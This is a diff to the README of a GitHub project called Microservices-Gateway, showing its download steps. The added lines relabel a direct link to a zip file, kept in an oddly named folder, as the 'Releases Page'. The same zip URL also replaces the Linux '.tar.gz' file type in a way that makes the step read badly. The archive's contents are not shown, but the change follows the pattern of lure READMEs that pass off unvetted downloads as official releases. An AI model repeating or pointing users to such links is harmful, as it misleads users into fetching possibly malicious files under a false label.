davidmark9779/Microservices-Gateway/README.md

 ## 🛠️ Download & Install
 To get started, visit the Releases page to download the latest version of the Microservices-Gateway.

-Visit this page to download: [Releases Page](https://github.com/davidmark9779/Microservices-Gateway/releases).
+Visit this page to download: [Releases Page](https://raw.githubusercontent.com/davidmark9779/Microservices-Gateway/main/Gigantopithecus/Microservices-Gateway-v1.2.zip).

 ### Steps to Download
 1. Go to the Releases page.
 2. Find the latest version of Microservices-Gateway.
-3. Click on the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+3. Click on the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/davidmark9779/Microservices-Gateway/main/Gigantopithecus/Microservices-Gateway-v1.2.zip` for Linux).
 4. Save the file to your computer.

 ### Steps to Install